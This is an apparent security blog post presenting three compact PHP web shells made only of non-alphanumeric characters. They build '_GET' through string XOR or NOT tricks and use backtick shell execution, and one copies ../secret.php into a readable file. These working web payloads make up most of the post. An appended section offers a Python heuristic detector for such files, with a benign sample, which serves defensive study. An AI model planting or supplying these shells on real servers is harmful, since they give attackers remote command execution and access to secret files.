Special-Characters-Only WebShell
HACK/WEB 2018. 7. 17. 18:18
40byte WebShell(only Non-alphanumeric)
/*
 *** Substitution ***
 * '$<>/'^'{{{{' => '_GET'
 * ${$_}[_](${$_}[__]) => ${'_GET'}[_](${'_GET'}[__])
 *
 *** Final ***
 * <?=$_GET[_]($_GET[__])
 */
<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
33byte WebShell(only Non-alphanumeric)
<?=`/???/??? ../??????.??? > ===` // ex) /bin/cat ../secret.php > ===
21byte WebShell(only Non-alphanumeric)
<?=`{${~"����"}[_]}`;
// ���� stands for the four raw bytes \xa0\xb8\xba\xab, which are not printable as text
// echo -ne '<?=`{${~"\xa0\xb8\xba\xab"}[_]}`;'
// ~"\xa0\xb8\xba\xab" => _GET
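A defender-side sketch, added here and not part of the original post: a Python heuristic that flags PHP files whose code has almost no letters or digits and uses the constructs the three samples above rely on (string XOR/NOT, variable-variable calls, backticks). The rule names, the thresholds, the `is_suspicious` policy and the benign sample are assumptions made for this example.

```python
import re

# PHP code regions: after <?php / <?= / <? up to ?> (the close is optional at EOF).
PHP_BLOCK = re.compile(rb"<\?(?:php|=)?(.*?)(?:\?>|\Z)", re.S)
RULES = {
    # XOR between string literals, or bitwise NOT applied to a string literal
    "string-bitop": re.compile(rb"""(['"])[^'"]*\1\s*\^\s*['"]|~\s*['"]"""),
    # ${...}[...]( : an element of a variable-variable used as a callable
    "dynamic-call": re.compile(rb"\$\{[^}]*\}\s*\[[^\]]*\]\s*\("),
    # backtick operator, which PHP hands to the shell
    "backtick-exec": re.compile(rb"`[^`]+`"),
}

def alnum_ratio(code: bytes) -> float:
    """Share of ASCII letters and digits among the non-whitespace bytes."""
    dense = b"".join(code.split())
    return len(re.findall(rb"[0-9A-Za-z]", dense)) / len(dense) if dense else 1.0

def findings(data: bytes, max_ratio: float = 0.2, min_len: int = 8) -> list:
    """Return the sorted names of every heuristic that fires on the PHP code."""
    code = b"\n".join(PHP_BLOCK.findall(data))
    hits = [name for name, rx in RULES.items() if rx.search(code)]
    if len(b"".join(code.split())) >= min_len and alnum_ratio(code) < max_ratio:
        hits.append("low-alnum")
    return sorted(hits)

def is_suspicious(data: bytes) -> bool:
    # Assumed policy: almost no letters/digits plus at least one risky construct.
    hits = findings(data)
    return "low-alnum" in hits and len(hits) >= 2

# The three samples from this page, plus one constructed benign file.
SAMPLES = {
    "xor-40": rb"<?=$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);",
    "glob-33": rb"<?=`/???/??? ../??????.??? > ===`",
    "not-21": b'<?=`{${~"\xa0\xb8\xba\xab"}[_]}`;',
    "benign": rb"<?php echo htmlspecialchars($_GET['name'] ?? 'guest'); ?>",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:8} suspicious={is_suspicious(data)} {findings(data)}")
```

Keyword or signature scanners that look for names such as `eval`, `system` or `$_GET` see none of them in these files, which is why the check keys on character distribution and operator shape instead.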